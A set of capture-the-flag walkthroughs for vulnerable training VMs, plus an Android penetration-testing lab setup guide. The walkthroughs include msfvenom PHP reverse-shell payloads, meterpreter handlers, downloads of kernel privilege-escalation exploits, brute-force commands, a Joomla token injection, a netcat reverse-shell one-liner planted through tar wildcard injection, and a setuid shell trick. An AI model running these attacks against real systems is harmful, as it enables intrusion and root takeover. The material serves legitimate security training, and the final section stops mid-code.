Open the tool; enter the target IP in Hostname, the username in User and the password in Password. Then click on OK.

Clicking on OK we will enter the database.

Click on wp_users to see the usernames and passwords of all the users.

As you can see, all the passwords are hashed. So now we will run a dictionary attack with WPScan against the first username we found, john, using rockyou.txt. The command to do so is:

wpscan --url https://192.168.1.105/blogblog --wordlist /usr/share/wordlists/rockyou.txt --username john

Once the attack completes we will have the password for the username john, which is: incorrect.

Now we will log in using the said username and password.

Once we have logged in, all we have to do is create our PHP code and upload it, so that once the code executes we get a session. To generate the code type:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.105 lport=4444 -f raw

Copy the code from <?php to die() and save it in a file with .php extension.

Now, as we are already logged in, go to the Plugins option and select Add Plugin. Click on Browse, select the PHP file in which you have just saved the code and click on OK.

Now go to the uploads directory and double click on the file you just uploaded.

Simultaneously, open metasploit and type:

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.1.113

set lport 4444

exploit

Executing the above exploit we will have a meterpreter session. Further type:

shell

Then type the following two commands to write and run a small Python file that spawns a proper terminal:

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py

python /tmp/asdf.py

Now, we will check the Ubuntu version so that we can find an exploit for it; type:

lsb_release -a

Now, with the following command, we will find a writable directory:

find / -writable -type d 2>/dev/null

We now know that our target is running Ubuntu 16.04, so we will search for an exploit for it on exploit-db.com. Our search is successful and we have found a suitable exploit, as shown below:

We already know that this exploit is not available in Metasploit, so we will copy its download link, as shown:

Now we need to go into the writable directory we found; for that type:

cd /tmp

And then to download the exploit type:

wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39772.zip

The exploit is downloaded as a zip file, so now unzip it; for that type:

unzip 39772.zip

Enter the unzipped directory by typing:

ls

cd 39772

Now we have a tar file named exploit.tar. Extract it with the following command:

tar -xvf exploit.tar

Now use ls to view the directories. Then go into the doubleput exploit folder by typing:

cd ebpf_mapfd_doubleput_exploit

ls (lists the directory contents)

./compile.sh (runs the compile script)

./doubleput (runs the compiled exploit)

whoami (shows which user you are now)

cd /root (takes you into /root)

ls (lists the contents of /root)

cat flag.txt

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

The post Hack the Stapler VM (CTF Challenge) appeared first on Hacking Articles.

Hack the Sydney VM (CTF Challenge)


Today we will take up a boot2root challenge by Nightmares. We will work on Sidney: 0.2, made by Nightmares. This is the third challenge he has genially come up with. The VM is set to grab a DHCP lease on boot. As before, gaining root is not the end of this VM; you will need to snag the flag. You can download this VM from –> https://www.vulnhub.com/entry/sidney-02,149/

Walkthrough

First we need to know what IP the VM got, so naturally scan the network using:

netdiscover

Now that we have located our target IP i.e. 192.168.0.104, our next step is to scan it.

nmap -A -p- 192.168.0.104

Upon scanning we know that port 80 is open, which means this IP will open in the browser, so let us try that.

On opening the target IP in the browser we did not get much information; therefore we will use the curl command to find out more about our target.

curl -v http://192.168.0.104/

Now if you look at the source code, you can see that the word “commodore64” is used a lot. So we opened it in the browser (192.168.0.104/commodore64) and, to our luck, we found another page.

Then we decided to look into its page source.

As you read the page source you will come to know that the username is robhubbard, and going further you will find some hints about the password:

  • the password is in lowercase
  • the password has 3 letters and four digits
  • it is related to the C=64 sound chip

After looking into the page source we tried to explore it more with nikto.

nikto -h http://192.168.0.104/commodore64/

Exploring with nikto proved helpful, as it found an index.php file. We opened it and, as you can see, it asks for a username and password. We already know the username; we just have to find the password.

With the above hints about the password, we first decided to look up the C=64 sound chip on Wikipedia. And we found:

We knew that the password’s first three characters are letters, so our best guess is that MOS is the first three characters of the password.

Now everything depends on the last four digits of the password, and to generate candidates for them we used the crunch command:

crunch 7 7 -t mos%%%% -o /root/Desktop/pass.txt

Crunch will generate your dictionary file.

Then apply a dictionary attack using Burp Suite, which will show you the password as below:

Now on the index.php page enter the username and password. The following page will open, and on this page you have to upload a malicious PHP file.

Entering the password, you will log on to the following page:

Now to generate the said php open the terminal in your Kali and type:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.106 lport=4444 -f raw

Copy the code from <?php to die() and save it in a file with .php extension. Now upload this file by browsing it on the webpage.

Simultaneously, open metasploit and type:

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.1.113

set lport 4444

exploit

Executing the above exploit we will have a meterpreter session. Further type:

shell

If you type the usual two commands to spawn a TTY with Python, they will not work, as the Python version on this box is newer:

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py

python /tmp/asdf.py

So to solve this problem you need to run a different set of commands:

python3.5 -c 'import pty; pty.spawn("/bin/bash")'

/bin/bash

Now you will reach the terminal. Here, type the following command to find out the kernel version:

lsb_release -a

Now that we know the kernel’s version we will search for its exploit on www.exploit-db.com

On the exploit page you will find the link to download it.

Now we need a writable directory to download the exploit into, so type:

find / -writable -type d 2>/dev/null

Then go into that directory:

cd /tmp

In the /tmp folder, wget gives an error on this box, so we have to use curl this time:

curl -O https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/39772.zip

Now unzip the file by typing:

unzip 39772.zip

Enter the unzipped directory by typing:

cd 39772

Now we have a tar file named exploit.tar. Extract it with the following commands:

ls

tar -xvf exploit.tar

And now move into the exploit directory by typing:

cd ebpf_mapfd_doubleput_exploit

Moving forward, type:

ls (lists the directory contents)

./compile.sh (runs the compile script)

./doubleput (runs the compiled exploit)

whoami (shows which user you are now)

cd /root (takes you into /root)

ls (lists the contents of /root)

Now we are in /root on our target. Let’s see what it has to offer us; for that type:

ls -lsa

All the files are listed, and from the list we will try to open hint.gif, but first we have to copy it; therefore type:

cp hint.gif /var/www/html

Now if you open hint.gif in the browser it will show you the following image:

So, we will check other files too, like .commodore64; type:

cd .commodore64

And again to see what it has to offer us type:

ls -lsa

From all the files listed we will open the following:

cd .miami

ls -lsa (it will further list the folders)

cd vice (enter into vice)

flag.zip

Don’t get too excited that we have obtained the flag; we still have to open it. And here is the trick: if you try to open the zip file it will ask you for a password. So, we will try to open it in the browser, and for that we first have to copy it, so type:

cp flag.zip /var/www/html/commodore64

When you open it in the browser it will ask you to download flag.zip. So, download it.

We will apply dictionary attack using rockyou.txt so for this the command is:

fcrackzip -vuD -p /usr/share/wordlists/rockyou.txt /root/Desktop/flag.zip

And yes, at last you have the password. So now unzip the flag.zip by typing:

unzip flag.zip

Then it will ask you the password. Enter the recently obtained password here.

And YAY!!!!! We have captured the Flag!!! Enjoy with it.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here


Build an Android Penetration Testing lab


Nowadays mobile users are increasing day by day, and the security threats are increasing along with them. These threats can disrupt the operation of the smartphone and transmit or modify user data. For these reasons, the applications deployed on them should ensure the privacy and integrity of the information they manage. Mobile security involves protecting personal and business information stored on and transmitted from smartphones, tablets, laptops and other mobile devices. Mobile security has become very important in mobile computing because of the day-by-day increase in sophisticated attack methods. So, now we will see how to exploit and analyze an Android application for vulnerabilities.

So first we have to set up an environment for Android application testing.

Requirements for Android penetration testing:

  • Virtual Box
  • Santoku OS, which comes with preinstalled SDKs.
  • GenyMotion for creating an Android Virtual Device (AVD)
  • A vulnerable Android app, “InsecureBankv2”.

Let’s start…

So first download Santoku OS from here. Santoku OS is built especially for mobile penetration testing and forensic investigation. Santoku comes with pre-installed SDKs and other utilities. There are also a bunch of forensic tools, like firmware flashing tools for multiple vendors and other forensic scripts for enumerating app details.

After downloading Santoku open Virtual Box and create a new virtual machine for it.

Now select the RAM for the Santoku VM; the recommended size is 786MB but I took 2GB. You can select according to your own needs and click NEXT.

In this section select hard disk type as per your need or select VMDK (Virtual Machine Disk)

Here select the size of the hard disk as you wish and then create VM.

Now, to install Santoku on the VM we created, right click on the Santoku VM and go to Settings > Storage, select the empty disk, then click on the disk icon next to Optical Drive in the Attributes section, browse to the downloaded Santoku ISO file and click OK.

Finally launch that VM; after a few seconds the Santoku boot menu will appear. Select “Install - start the installer directly”.

Now the installation process will begin. Select your preferred language, click Continue and then click Install Now.

Select your preferred keyboard layout.

Now in this section name your VM and set a strong password for login. You can also choose “Log in automatically”, but that is not a good choice.

Now santoku will start copying files and installing. Now sit back and wait for few minutes after that it will restart.

Here our Santoku is installed that means our first part is completed.

Now you can download Genymotion from here.

Basically, Genymotion is a relatively fast Android emulator which comes with pre-configured Android with OpenGL hardware acceleration suitable for application testing.

After installing Genymotion, go to https://www.genymotion.com/account/create/  and create a free account there and verify your email ID. Then come back to genymotion desktop software and login there using newly created account credentials.

Now to create an AVD click on ‘Add’; a new menu will appear where you can select Android devices by brand and version number.

Select the device according to your need and click Next. In the next section, review the configuration of the Android device and finally create the virtual device.

Now Genymotion will download the data and deploy the virtual Android device.

Here you can see I created 2 virtual devices. Now select the devices and launch it.

Here is our Android Virtual Device.

To test our application for any kind of vulnerability we need the Android SDK, because in our testing phase we will use the ADB (Android Debug Bridge) command line almost all the time. The Android SDK is preinstalled in Santoku OS. So, now we are going to connect Santoku to our Android Virtual Device.

First check the IP of the Android Virtual Device.

Now open command line in Santoku and type:

adb connect <IP of Android Virtual Device>

You can check whether device is connected or not by typing:

adb devices

So here we can see that the list shows 1 device connected.

And here you can also open a shell on the Android device by typing:

adb shell

So here our penetration testing lab for Android applications is complete. Stay tuned for the next article on actual Android app penetration testing and hacking.

Author: Akshay Bhardwaj is a passionate Ethical Hacker, Information Security Researcher and Technical Writer currently working at Provensec LLC as a Security Researcher. You can follow him on LinkedIn and Twitter.



Hack the SickOS 2.1 VM (CTF Challenge)


In this walkthrough I will explain how to solve the SickOs 1.2 challenge. This VM is the second in the SickOs series and is independent of the prior release; the scope of the challenge is to gain the highest privileges on the system. This CTF gives a clear analogy of how hacking strategies can be performed on a network to compromise it, in a safe environment.

First Download Sick OS from Here

So, first let us find our target by using :

netdiscover

Our target is 192.168.1.105. Next we run an nmap scan:

nmap -A -p- 192.168.1.105

As you can see that port 80 is open that means we can open this IP in the browser. Why not do that?

Opening the IP in the browser shows us the above image, which is of no use. You can try and look into the page source, but unfortunately you will find nothing there. That is why we will use dirb to find the directories. For that type:

dirb http://192.168.1.105

As a result you can see we have found our directory, i.e. test. Open it in the browser as well.

192.168.1.105/test/

It will show you the list of directories. So let us try and explore test directory via curl.

curl -v -X OPTIONS http://192.168.1.105/test

This shows that PUT is allowed, which means you can upload files through it.
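As an added defender-side check (not part of the original post), the following shell helper extracts the Allow header from an OPTIONS response like the one curl returned above and flags write-capable methods such as PUT; probe_options runs the same check against a URL with curl.

```shell
# Added example, not from the original post: audit the methods a web server
# advertises for a path (the "PUT is allowed" finding on /test above).

# Methods that let a client create, change or delete server-side files. A
# public web root should never advertise any of these; on Apache they can be
# blocked for a directory with a <LimitExcept GET POST HEAD> block.
RISKY='PUT|DELETE|PATCH|PROPFIND|PROPPATCH|MKCOL|COPY|MOVE|LOCK|UNLOCK'

risky_methods() {
    # $1: the raw header block of an OPTIONS response (CRLF or LF line ends).
    # Prints each risky method found in the Allow header, one per line.
    # Returns 1 when at least one was found, 0 when the Allow header is clean.
    _found=$(printf '%s\n' "$1" \
        | tr -d '\r' \
        | awk 'tolower($1) == "allow:" { sub(/^[^:]*:[ \t]*/, ""); print }' \
        | tr ',' '\n' \
        | tr -d ' \t' \
        | grep -Ex "$RISKY" || true)
    if [ -n "$_found" ]; then
        printf '%s\n' "$_found"
        return 1
    fi
    return 0
}

probe_options() {
    # $1: URL to check, e.g. http://192.168.1.105/test
    # Fetches the OPTIONS response headers with curl and hands them to
    # risky_methods; exit status 1 therefore means "uploads are possible here".
    risky_methods "$(curl -s -i -X OPTIONS "$1")"
}
```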

So, prepare the malicious file that you would upload with msfvenom :

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.113 lport=4444 -f raw

Copy the code from <?php to die() and save it in a file with .php extension.

Now, to upload your .php file we will use the Firefox add-on Poster.

Click on Tools in the menu bar and then click on Poster in the drop-down menu.

The following dialog box will open. Here, browse to the file that you want to upload and click on the PUT option.

It will show you that the file is uploaded.

And you can see the same in your browser: your file will have been uploaded (in our case the file is shell.php)

Simultaneously, open metasploit and use multi/handler :

use multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.1.113

set lport 4444

exploit

After hitting Enter, run the file you just uploaded. It will give you a meterpreter session. Drop to a shell by typing:

shell

Now we need to import the python file to reach the terminal and to do so type :

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py

python /tmp/asdf.py

Now the kernel version might be exploitable, so to check the version type:

lsb_release -a

As you can see that version is not exploitable so we will leave it alone.

Moving further, type the following to explore more and find something exploitable:

ls -l /etc/cron.daily

The above command will give you a list of the files. On observing you can see that there is chkrootkit. Some of its versions are exploitable, therefore we will check its version; for that type:

chkrootkit -V

It will show you the version which is 0.49

We will now search for its exploit in the terminal of Kali by typing :

searchsploit chkrootkit

Here are the exploits.

Now open metasploit and check the already opened session first and then look for the exploit by typing :

search chkrootkit

The exploit which you have to use will appear. Use it, and then type options so that you know what you are supposed to set. Checking the options, you only need to assign the session and lport, so type:

use exploit/unix/local/chkrootkit

set session 1

set lport 8080

exploit

Now check whether you have gained another session or not and for that type :

sessions

And as you can see you will surely have one more session and so to open that session type :

sessions -i 2

As you open the session check what user you are in and for that type :

whoami

It will show you that you are root, so further type:

cd /root

And to see the list of files in /root type :

ls -lsa

In the list you will see that there is a text file and to read that file type :

cat 7d83aaa2bf93d8040f3f22ec6ad9d5a.txt

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here


Hack the Simple VM (CTF Challenge)


Simple CTF is a boot2root that focuses on the basics of web based hacking. Once you load the VM, treat it as a machine you can see on the network, i.e. you don’t have physical access to this machine. Therefore, tricks like editing the VM’s BIOS or Grub configuration are not allowed. Only remote attacks are permitted. /root/flag.txt is your ultimate goal. Therefore, in this article I will walk you through the whole method of completing this challenge.

First Download Simple VM from here

We start by identifying our target with the following command :

netdiscover

Our target is 192.168.0.104

Then move on to scanning our target with nmap:

nmap -A -p- 192.168.0.104

On scanning, you will find that port 80 is open. So we will now open it on our browser.

Now we can see that our target is using CuteNews v.2.0.3 and the good news is it is exploitable, so let’s search for its exploit :

searchsploit cutenews 2.0.3

Upon searching for the exploit we can see that we have the path to the exploit. Follow the path and open the exploit’s “.txt” file. In the text file you find the instructions to upload the file. First, it tells us to register on the website in order to be able to upload a file. To register it will ask you for a username and password. When you complete the registration steps it will redirect you to the following window:

Now we need a file to upload, so create it with msfvenom:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.103 lport=4444 -f raw

Copy the code from <?php to die() and save it in a file with .php extension. To upload the file, log in with the username you have just registered, click on personal options, give your username and mail ID, browse to the file that you want to upload and click on save.

Now we will use dirb to find the directories. For that type:

dirb http://192.168.0.104

It will show you the uploads directory. This is the directory where your file will be uploaded. Open the directory in the browser and you find your uploaded file there.

Now go to metasploit and type :

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.1.113

set lport 4444

exploit

Executing the above exploit we will have a meterpreter session. Further type:

shell

And if you type the following two commands to spawn a TTY with Python, they will not work, as the Python version on this box is newer:

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py

python /tmp/asdf.py

Now you will reach the terminal. Here, type the following command to find out the kernel version:

lsb_release -a

As we know that this version of the kernel is vulnerable, we will download its exploit with the command given below:

wget https://www.exploit-db.com/download/36746 -O 36746.c

This downloads the exploit. Next, compile it:

gcc 36746.c -o access -static

Now run the compiled binary:

./access

Then type id to check which user you are, and then type:

cd /root

This will take you into /root. Further type:

ls

It will list the files and one of those files will be flag.txt. To read the flag type :

cat flag.txt

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here


Hack the Kevgir VM (CTF Challenge)


In this article we will walk through a boot2root penetration testing challenge, Kevgir. Kevgir is a vulnerable framework based on the concept of CTF (Capture The Flag).

First Download Kevgir VM From Here

Start off by finding the target using:

netdiscover

Our target is 192.168.0.104 Now scan the target with nmap :

nmap -A -p- 192.168.0.104

With the nmap scan you can see that ports 80, 139, 2049, 6379, 8080, 8081, 9000, 40383 and many others are open, as shown in the images above and below:

Also, if you observe, you can see that port forwarding is used here, e.g. the HTTP service is open on ports 80, 8080 and 8081. So, let us try to open our target on ports 80 and 8081.

On port 80 our target opens as the following:

And on port 8081 it opens as:

The CMS of the website is Joomla and this version of Joomla, as everyone knows, is exploitable. We will scan the target with joomscan:

joomscan -u http://192.168.0.104:8081

Running joomscan will show all the exploitable vulnerabilities. Now if you look closely, exploit number 15 shows you the steps to exploit a certain vulnerability. Accordingly, go to 192.168.0.104:8081/index.php?option=com_user&view=reset&layout=confirm

When you go to the said url, it will ask you for the token.

Type an apostrophe (‘) in the token adjacent text box.

It will redirect you to a page where it will ask you to set up a new password.

After setting up the new password, login with the username and the password that you had just set.

Now that you are logged in, go to the Extensions menu and select Template Manager from the drop down menu.

Create the malicious code that you are going to upload via msfvenom.

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.103 lport=4444 -f raw

Copy the code from <?php to die(); and, once you have opened the Template Manager, choose the Beez template.

Paste the copied code there and click on save button.

Simultaneously, run multi/handler in metasploit by typing :

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.1.113

set lport 4444

exploit

Executing the above exploit we will have a meterpreter session. Further type:

shell

And if you type the following two commands to spawn a TTY with Python, they will not work, as the Python version on this box is newer:

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py

python /tmp/asdf.py

Now you will reach the terminal. Here, type the following command to find out the kernel version:

lsb_release -a

And now look for a writable directory by typing:

find / -writable -type d 2>/dev/null

Now, this was our routine method to complete any CTF challenge, but in this case it did not work: we tried to download the exploit but it failed. So we tried to get in through SSH, which is running on port 1322 as the nmap scan suggests.

For this, go to the terminal of Kali and type:

ssh admin@192.168.0.104 -p 1322

To obtain the SSH password you need to apply a brute force attack; the username and password you will get are admin and admin respectively.

Now you have logged in as the admin user. Here, download the exploit into the /tmp directory:

wget https://www.exploit-db.com/download/39166 -O 39166.c

Once the exploit has downloaded, compile it; for that type:

gcc 39166.c -o privs

Then give the permission to the privs by typing :

chmod 777 privs

and then run it :

./privs

And so you have reached root. Congrats!!

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here


Hack the Milnet VM (CTF Challenge)


This is a boot2root challenge which we will try to complete. This VM is created by Warrior and is a basic exploitable VM, so we do not need to worry about any advanced exploits or reverse engineering.

Download the VM from –> https://www.vulnhub.com/entry/milnet-1,148/

As always start off by locating the target with the following command:

netdiscover

Our target is 192.168.0.105. Now we will scan our target with nmap to know all about its ports.

nmap -A -p- 192.168.0.105

To know more about our target we will use nikto.

nikto -h 192.168.0.105

As you can see we did not acquire much information from nikto so let us open it on our browser, maybe we can find something from there.

Looking into the page source and all the tabs on the left side, we could not find anything. So we explored and searched a lot and found a remote file inclusion vulnerability. Upon finding the said vulnerability our next step was clear, i.e. we had to use Tamper Data.

So go to Tools on menu bar and select Tamper data

When the Tamper Data opens click on Start Tamper.

Then click on main button, a dialog box will open and from this dialog box click on Tamper.

Now generate the php code with the help of which we will have our meterpreter session and to generate the code type:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.103 lport=4444 -f raw

Copy the code from <?php to die() and save it in a file with the .php extension. After the file is saved, move it to /var/www/html

Then on Tamper Data give the path of the file without the extension in the text box adjacent to route. For example type:

http://192.168.0.103/evil?

Before clicking on OK run metasploit and type:

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.103

set lport 4444

exploit

And when you click on ok you will have your meterpreter session. You can type the following command to get the information of the system:

sysinfo

Then type the following set of commands to reach the terminal:

shell

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py

python /tmp/asdf.py

Now that we are in the terminal, we will look for the kernel version to know whether it is vulnerable or not; for that type:

lsb_release -a

As you can see, the kernel’s version is not exploitable. So we searched for any other option which could help us gain root access, and looked into /etc/passwd with the following command:

cat /etc/passwd

This file shows a user named langman, so we turned to that user. We checked the home directories by typing:

cd /home

ls

And then we switched:

cd langman

Then check the list of things present in langman by typing:

ls

There is only one folder available so let’s go into it.

cd SDINET

ls(to check the contents of SDINET)

Here, in SDINET you will find a text file which shows you all the steps to move ahead. It describes Unix wildcard attacks.

https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt

Some further digging revealed that crontab was running a backup script as root, which used tar to compress the contents of /var/www/html. One of the attacks mentioned in the text document covered tar. The commands we used are:

cat /etc/crontab

cat /backup/backup.sh

Now we will open an additional listener for our attack. And for that open the terminal of Kali on the side and type:

nc -lvp 443

This will help us to achieve arbitrary command execution stemming from the tar command within the backup.sh script.

Next we ran the following commands:

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.0.103 443 >/tmp/f" > shell.sh

touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"

touch "/var/www/html/--checkpoint=1"

The above commands make tar run shell.sh after the first file is archived: the shell expands the wildcard in the backup script, so the two crafted file names reach tar as --checkpoint options rather than as files. Since backup.sh runs as root, this spawns a netcat shell and sends it to the attack platform on port 443.
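The tar wildcard issue above is worth being able to audit on your own hosts. The following is an added example, not code from the Milnet VM or from the original post: a small Python audit that flags tar invocations in a backup script which archive an unquoted shell glob, lists directory entries whose names begin with "-" (which tar would parse as options, marking the ones that execute commands), and builds the equivalent hardened invocation that archives "." from inside the directory instead. The sample script text and the file names are constructed for the example.

```python
import os
import re
import shlex

# Constructed sample of a root-run backup script of the kind described above.
# It is NOT the Milnet VM's actual /backup/backup.sh.
SAMPLE_BACKUP_SH = """#!/bin/bash
# nightly copy of the web root
cd /var/www/html
tar czf /backup/html.tgz *
"""

# GNU tar options that change behaviour or run commands when a file name is
# mistaken for an option (the --checkpoint pair is the one used above).
DANGEROUS_TAR_OPTS = ("--checkpoint", "--checkpoint-action", "--to-command",
                      "--use-compress-program", "--rsh-command")


def risky_tar_lines(script_text):
    """Return tar invocations whose operand list is an unquoted shell glob.

    The shell expands '*' before tar runs, so an entry named like
    '--checkpoint-action=exec=...' arrives as an option, not a file.
    A '--' in the command line ends option parsing, so such lines are
    not flagged.
    """
    hits = []
    for line in script_text.splitlines():
        stripped = line.strip()
        if not re.match(r"(\S*/)?tar\b", stripped):
            continue
        try:
            argv = shlex.split(stripped)   # shlex keeps the literal '*'
        except ValueError:                 # unbalanced quotes: skip the line
            continue
        if "--" in argv:
            continue
        if any(tok == "*" or tok.endswith("/*") for tok in argv[1:]):
            hits.append(stripped)
    return hits


def option_like_names(entries):
    """Entries that would be parsed as tar options if globbed, each paired
    with whether its option name is in DANGEROUS_TAR_OPTS. `entries` is a
    list of names (e.g. os.listdir(path)) so the check also runs on a
    constructed list."""
    out = []
    for name in sorted(entries):
        if name.startswith("-"):
            option = name.split("=", 1)[0]
            out.append((name, option in DANGEROUS_TAR_OPTS))
    return out


def scan_directory(path):
    return option_like_names(os.listdir(path))


def hardened_tar_argv(archive, directory):
    """Same backup without the wildcard: change into the directory and archive
    '.', so file names never reach tar's option parser. Handed to
    subprocess.run() as a list, nothing is shell-expanded either."""
    return ["tar", "-czf", archive, "-C", directory, "."]


if __name__ == "__main__":
    print(risky_tar_lines(SAMPLE_BACKUP_SH))
    print(option_like_names(["index.html", "--checkpoint=1",
                             "--checkpoint-action=exec=sh shell.sh"]))
    print(" ".join(hardened_tar_argv("/backup/html.tgz", "/var/www/html")))
```

Run it against the scripts referenced from /etc/crontab and the directories they archive; a hit from risky_tar_lines together with a dangerous entry from scan_directory is the exact situation the walkthrough exploits.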

Now go back to the terminal window where the listener is running.

And BAM!! The Flag is captured!!

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast.

The post Hack the Milnet VM (CTF Challenge) appeared first on Hacking Articles.

Hack the SkyDog VM (CTF Challenge)


SkyDog is a Capture the Flag VM with six flags. Capturing these flags is quite fun and interesting. Before starting off I am listing the following hints that we know of beforehand:

Flag #1 Home Sweet Home or (A Picture is worth a Thousand Words)

Flag #2 When do Androids Learn to Walk?

Flag #3 Who Can You Trust?

Flag #4 Who Doesn’t Love a Good Cocktail Party?

Flag #5 another Day at the Office

Flag #6 Little Black Box

Now that we have paid attention to all of the hints, let us start by discovering our target.

netdiscover

Our target is 192.168.1.114. Scan the target with nmap.

nmap -A -p- 192.168.1.114

The result shows that ports 22 and 80 are open. Therefore, open the IP in the browser. As you can see there is nothing but the CTF image on the webpage.

Download the image and read it with exiftool.

exiftool SkyDogCon_CTF.jpg

 


Reading the image's metadata we find Flag #1. The flag is an MD5 hash value, which we crack with the online MD5 cracker crackstation.net.

The hash resolves to the words welcome home, so Flag #1 is Welcome Home. Now, on to the next flag. But before that let's explore more with nikto.

nikto -h 192.168.1.114

With the help of nikto we found a robots.txt file. And yes! Opening it in the browser we found our next flag. Crack the MD5 value of the flag with crackstation.net.

On cracking, the value of Flag #2 is Bots.

After cracking Flag #2 we explored robots.txt some more. Opening all the allowed directories one by one, there was one which opened, i.e. /Setec.

On opening the page source of /Setec you will find an Astronomy directory.

Now open this directory by typing: 192.168.1.114/Setec/Astronomy

Here you will find whistler.zip. Download the file and run a dictionary attack to find its password with the help of rockyou.txt; for that type:

fcrackzip -vuD -p /usr/share/wordlists/rockyou.txt /root/Desktop/whistler.zip

And you will find the password i.e. yourmother and now of course unzip the file:

unzip whistler.zip

After unzipping you will find Flag #3 and another file with a hint. First open the flag:

cat flag.txt

You will have your flag again in MD5 value. Crack it with similar method.

On cracking the MD5 value you will get flag i.e. yourmother.

Now open the other file:

cat QuesttoFindCosmo.txt

This file will give you a hint regarding OSINT.

OSINT: Open-source intelligence (OSINT) is intelligence collected from publicly available sources. In the intelligence community (IC), the term “open” refers to overt, publicly available sources (as opposed to covert or clandestine sources); it is not related to open-source software or public intelligence.

That means we have to find something related to OSINT. If you recall, there was a similar thing in the movie Sneakers, so we will use the movie and apply CeWL here. CeWL lets us create a dictionary file from a URL, and here we will use the URL of the movie's trivia page to build the dictionary file. Therefore type:

cewl --depth 1 http://www.imdb.com/title/tt0105435/trivia?ref_=tt_ql_2 -w /root/Desktop/sneakers.txt

Now we will use this sneakers.txt file to find a directory.

dirb http://192.168.1.114 /root/Desktop/sneakers.txt

This command will show us the following directories:

  • PlayTronics
  • Setec
  • Astronomy

We have already seen the content of Setec and Astronomy directories and so we will now explore PlayTronics.

And to our luck we found Flag #4 in the PlayTronics directory. Crack the flag with the same method and you will have the Flag #4 value i.e. leroybrown

In PlayTronics we also found a file with the .pcap extension. Open that file with Wireshark. Studying its data carefully you will find an audio file; download it.

Upon playing the file you will hear only one name, i.e. werner brandes. This name can be our username, so make a text file with possible username combinations built from "werner brandes". Also make a text file of passwords containing all the flag values that we have found so far.

Now that you have possible usernames and passwords, apply a dictionary attack on SSH to find the correct pair. For that open metasploit and type:

use auxiliary/scanner/ssh/ssh_login

set rhosts 192.168.1.114

set rport 22

set user_file /root/Desktop/user.txt

set pass_file /root/Desktop/pass.txt

run

And you have your username and password, i.e. wernerbrandes:leroybrown. Now log in with SSH:

ssh wernerbrandes@192.168.1.114

(Password = leroybrown)

And fortunately we also find Flag #5, again as an MD5 value. Crack it with the same method and it turns out to be Dr. Gunter Janek

Now let’s find a writable file and for that type:

find / -writable -type f

If you look through the output you will see that /lib/log/sanitizer.py is writable by everyone.

So we will open the sanitizer.py file with the following steps:

cd /lib

cd log

nano sanitizer.py

On opening sanitizer.py, change the command string inside the brackets to:

('chmod u+s /bin/sh')

This sets the setuid bit on /bin/sh, so once the script has executed the command with root privileges, /bin/sh runs as root for whoever launches it. So now go to /bin/sh with the following steps:

cd ..

cd ..

/bin/sh

Use the following commands to check your id:

id

whoami

Then go to the /root.

cd /root

See the list of files:

ls

There is only one folder so let’s see what it has to offer.

cd BlackBox

ls -lsa

Again you will find a Blackbox folder. Open it.

cd Blackbox

ls -lsa

And finally you will have your last flag:

cat flag.txt

Crack the value of flag with the same method.

HURRAYYY!!! All six flags have been captured, and this CTF is completed.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast.

The post Hack the SkyDog VM (CTF Challenge) appeared first on Hacking Articles.

Hack the Breach 1.0 VM (CTF Challenge)


This time we are going to solve a fun VM i.e. Breach 1.0. Let’s find out what we already know about it:

Breach 1.0 is the first VM in a multi-part series; it is meant to be a beginner to intermediate boot2root/CTF challenge. It is configured with a static IP address (192.168.110.140), so you will need to configure your host-only adaptor to this subnet. Start with an nmap scan:

nmap -Pn 192.168.110.140

As you can see it shows almost all ports open, which can only mean one thing: an IDS is active.

Now let’s start nikto :

nikto -h 192.168.110.140

Nikto proved to be useless in this case. So let's turn our attention to port 80, the most familiar open port, and investigate it by opening the target IP in the browser.

On the home page you will find an image with some dialogue/comments. Open the page source and you will find a base64-encoded string in an HTML comment:

<!-- Y0dkcGltSm9ibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo -->

Decode this string using the HackBar Add-on for Firefox. Enable the Add-on, click on its Encoding tab and then select the Decode option. It will ask for the string that you want to decode; paste the string there and click OK.

It will show the Base64 code again which means that the code has been encoded twice.

Further decode it with the similar method and you will have one username and password.
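Finding and peeling nested base64 strings in HTML comments is routine enough to automate, so here is an added example in Python that is not part of the original post: it pulls every HTML comment out of a page, decides whether the body looks like base64, and decodes layer by layer until the result stops looking like base64 or stops being printable text. The sample HTML and the encoded credential are constructed for the example; the same function is the check a reviewer can run over a site's page source before release to catch secrets left in comments.

```python
import base64
import binascii
import re
import string

B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
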